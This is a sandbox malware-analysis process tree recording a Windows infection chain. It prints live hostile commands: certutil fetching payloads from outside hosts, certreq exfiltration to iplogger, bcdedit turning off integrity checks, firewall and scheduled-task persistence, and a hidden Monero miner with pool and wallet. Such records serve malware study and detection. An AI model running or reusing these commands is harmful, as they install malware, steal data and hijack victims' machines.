C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 12849⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 12249⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\vmeyfxhu2ct\app.exe"C:\Users\Admin\AppData\Local\Temp\vmeyfxhu2ct\app.exe" /8-238⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gpzZEBmyiBbD\kdu.exeC:\Users\Admin\AppData\Local\Temp\gpzZEBmyiBbD\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\gpzZEBmyiBbD\driver.sys9⤵
- Suspicious behavior: LoadsDriver
-
-
C:\Users\Admin\AppData\Local\Temp\vmeyfxhu2ct\app.exe"C:\Users\Admin\AppData\Local\Temp\vmeyfxhu2ct\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\TsAMLIXhEnVCwKLEpSBzkdYnJkWW\kdu.exeC:\Users\Admin\AppData\Local\Temp\TsAMLIXhEnVCwKLEpSBzkdYnJkWW\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\TsAMLIXhEnVCwKLEpSBzkdYnJkWW\driver.sys10⤵
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"10⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes11⤵
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2310⤵
-
C:\Users\Admin\AppData\Local\Temp\xcOtFJojBLaNeoaSPYABYFDorESH\kdu.exeC:\Users\Admin\AppData\Local\Temp\xcOtFJojBLaNeoaSPYABYFDorESH\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\xcOtFJojBLaNeoaSPYABYFDorESH\driver.sys11⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F11⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F11⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"11⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 012⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 112⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 012⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}12⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy12⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v11⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"12⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=73ae12a7-fec6-4116-aa61-b205cc60252c&browser=chrome13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc2cb16e00,0x7ffc2cb16e10,0x7ffc2cb16e2014⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe11⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bwf3ial3ps4\0m43i133jut.exe"C:\Users\Admin\AppData\Local\Temp\bwf3ial3ps4\0m43i133jut.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\U0Z97CEASH\U0Z97CEAS.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\U0Z97CEASH\U0Z97CEAS.exe"C:\Program Files\U0Z97CEASH\U0Z97CEAS.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ddgp4se30yu\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\ddgp4se30yu\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-I4OIO.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-I4OIO.tmp\chashepro3.tmp" /SL5="$20384,3362400,58368,C:\Users\Admin\AppData\Local\Temp\ddgp4se30yu\chashepro3.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"11⤵
-
-
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"11⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵
- Checks computer location settings
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"10⤵
- Checks computer location settings
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵
-
-
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"11⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dpphsjs5yy0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\dpphsjs5yy0\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-J8P9T.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-J8P9T.tmp\vpn.tmp" /SL5="$103C4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\dpphsjs5yy0\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ayllywne0gm\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ayllywne0gm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-E3RSP.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-E3RSP.tmp\IBInstaller_97039.tmp" /SL5="$203AA,14464800,721408,C:\Users\Admin\AppData\Local\Temp\ayllywne0gm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-5TE9K.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-5TE9K.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-5TE9K.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ho4pcx5ujps\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ho4pcx5ujps\safebits.exe" /S /pubid=1 /subid=4518⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Roaming\OptioLink\pptlng.dll",pptlng C:\Users\Admin\AppData\Local\Temp\ho4pcx5ujps\safebits.exe9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1sp2yaf4hwr\kpvkhh2bni3.exe"C:\Users\Admin\AppData\Local\Temp\1sp2yaf4hwr\kpvkhh2bni3.exe" /ustwo INSTALL8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\54sseev5bu1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\54sseev5bu1\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TM1NH.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-TM1NH.tmp\Setup3310.tmp" /SL5="$404E0,802346,56832,C:\Users\Admin\AppData\Local\Temp\54sseev5bu1\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B5M35.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B5M35.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V9V2K.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9V2K.tmp\Setup.tmp" /SL5="$30574,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-B5M35.tmp\Setup.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\ProPlugin.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JF1HU.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-JF1HU.tmp\ProPlugin.tmp" /SL5="$6030A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\ProPlugin.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RJIC5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RJIC5.tmp\Setup.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"15⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\DataFinder.exe" /Verysilent12⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\Delta.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SMSQK.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-SMSQK.tmp\Delta.tmp" /SL5="$8030A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\Delta.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9HKLV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9HKLV.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-9HKLV.tmp\Setup.exe & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\zznote.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D6MRN.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-D6MRN.tmp\zznote.tmp" /SL5="$9030A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\zznote.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FTPKI.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-FTPKI.tmp\jg4_4jaa.exe" /silent14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-H0N78.tmp\hjjgaa.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\florxcegbnv\vict.exe"C:\Users\Admin\AppData\Local\Temp\florxcegbnv\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3360L.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3360L.tmp\vict.tmp" /SL5="$40512,870426,780800,C:\Users\Admin\AppData\Local\Temp\florxcegbnv\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CGLJ2.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-CGLJ2.tmp\wimapi.exe" 53510⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pad1r0g31rj\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\pad1r0g31rj\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KHALH.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KHALH.tmp\chashepro3.tmp" /SL5="$2055E,3362400,58368,C:\Users\Admin\AppData\Local\Temp\pad1r0g31rj\chashepro3.exe" /VERYSILENT9⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
-
C:\ProgramData\5076362.55"C:\ProgramData\5076362.55"5⤵
- Executes dropped EXE
-
-
C:\ProgramData\1535287.16"C:\ProgramData\1535287.16"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4C256BB4330656FABB241B6114C5D681 C2⤵
- Loads dropped DLL
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{09263e25-1a79-2147-9cdf-867882829d28}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000190"2⤵
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1d1ff86273f34a80b66413f0b5ed81b9 /t 6572 /p 67521⤵
-
C:\Users\Admin\AppData\Local\Temp\B3DB.exeC:\Users\Admin\AppData\Local\Temp\B3DB.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^LclAMwrfJRiNjlhXSZlDfaVoPHKJbmmurUsqCCnZoBJcKzCAVHAPrJFaAwLysxRlswKsShcdBlcNJmnvylNPZKexfZmARaINKmtIIlHIjlhThRJqDgquGwlHZdeTNUnpBHrpcPNVCyDPvpu$" Venuto.wks4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comBenedetto.com Amano.psd4⤵
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comC:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com Amano.psd5⤵
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comC:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com6⤵
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\BC29.exeC:\Users\Admin\AppData\Local\Temp\BC29.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\BC29.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\D05E.exeC:\Users\Admin\AppData\Local\Temp\D05E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D84E.exeC:\Users\Admin\AppData\Local\Temp\D84E.exe1⤵
-
